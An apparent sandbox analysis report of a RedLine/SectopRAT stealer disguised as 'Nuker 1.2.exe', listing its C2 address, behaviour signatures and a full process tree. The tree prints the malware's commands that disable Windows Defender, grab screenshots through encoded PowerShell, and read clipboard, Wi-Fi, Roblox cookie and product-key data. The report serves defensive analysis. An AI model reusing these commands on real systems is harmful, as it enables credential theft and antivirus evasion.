Analysis

  • max time kernel
    4s
  • max time network
    8s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08-12-2024 23:56

General

  • Target

    Nuker 1.2.exe

  • Size

    6.0MB

  • MD5

    ea52bb50895e85eba81d29a84318cb62

  • SHA1

    198d852c2baf2304e44da82e4ba74d591cf31776

  • SHA256

    7fd20dd1ce4c8e54f077ef9880dd8794158fc2406d66b7656e239f798eacfeee

  • SHA512

    8bbc5061f167f36deea84a909e1df87ac67a53e04195874f6892b73b37a0a79285ed945ae509972721a85c0df1cf5207486978ba870965810d9de8014e87f0f7

  • SSDEEP

    98304:UAmoDUN43W5NjOjFgFEblNHYSxTpirSHcUR43zrwkdA8QJCKC7bN3mb6ag1Rjtj4:UAumWDOjmFwDRxtYSHdK34kdai7bN3mz

Malware Config

Extracted

Family

redline

Botnet

mamut

C2

185.241.208.73:18430

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 41 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 51 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe
    "C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4676
    • C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe
      "C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1156
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2840
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nuker 1.2.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1648
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2724
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4404
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1284
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3572
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4556
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1068
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1544
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1076
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1856
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:900
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:572
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4016
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4308
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4884
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:3980
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1124
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:1388
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:3188
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:3756
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4900
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:2204
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4324
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4456
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qt5arhfp\qt5arhfp.cmdline"
              5⤵
                PID:3020
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB304.tmp" "c:\Users\Admin\AppData\Local\Temp\qt5arhfp\CSCFE3ADC32D3FA4B2389C2E37F65A4C1DD.TMP"
                  6⤵
                    PID:1124
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:400
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:2096
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3104
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:2108
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:1576
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:3372
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:3408
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:4388
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:412
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:2728
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:3092
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                  4⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:3756
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:4628
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                      PID:480
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "getmac"
                                    3⤵
                                      PID:3552
                                      • C:\Windows\system32\getmac.exe
                                        getmac
                                        4⤵
                                          PID:2728
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI46762\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\qJhaK.zip" *"
                                        3⤵
                                          PID:4604
                                          • C:\Users\Admin\AppData\Local\Temp\_MEI46762\rar.exe
                                            C:\Users\Admin\AppData\Local\Temp\_MEI46762\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\qJhaK.zip" *
                                            4⤵
                                              PID:4560
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                            3⤵
                                              PID:896
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic os get Caption
                                                4⤵
                                                  PID:5104
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                3⤵
                                                  PID:3036
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic computersystem get totalphysicalmemory
                                                    4⤵
                                                      PID:3464
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                    3⤵
                                                      PID:4644
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic csproduct get uuid
                                                        4⤵
                                                          PID:4948
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                        3⤵
                                                          PID:224
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                            4⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            PID:1496
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                          3⤵
                                                            PID:3676
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic path win32_VideoController get name
                                                              4⤵
                                                              • Detects videocard installed
                                                              PID:4964
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                            3⤵
                                                              PID:1240
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                4⤵
                                                                  PID:4356

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                            Filesize

                                                            3KB

                                                            MD5

                                                            74e4a39ae145a98de20041613220dfed

                                                            SHA1

                                                            ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

                                                            SHA256

                                                            2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

                                                            SHA512

                                                            96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            944B

                                                            MD5

                                                            aa4f31835d07347297d35862c9045f4a

                                                            SHA1

                                                            83e728008935d30f98e5480fba4fbccf10cefb05

                                                            SHA256

                                                            99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

                                                            SHA512

                                                            ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Filesize

                                                            944B

                                                            MD5

                                                            45f53352160cf0903c729c35c8edfdce

                                                            SHA1

                                                            b35a4d4fbaf2a3cc61e540fc03516dd70f3c34ab

                                                            SHA256

                                                            9cf18d157a858fc143a6de5c2dd3f618516a527b34478ac478d8c94ff027b0d2

                                                            SHA512

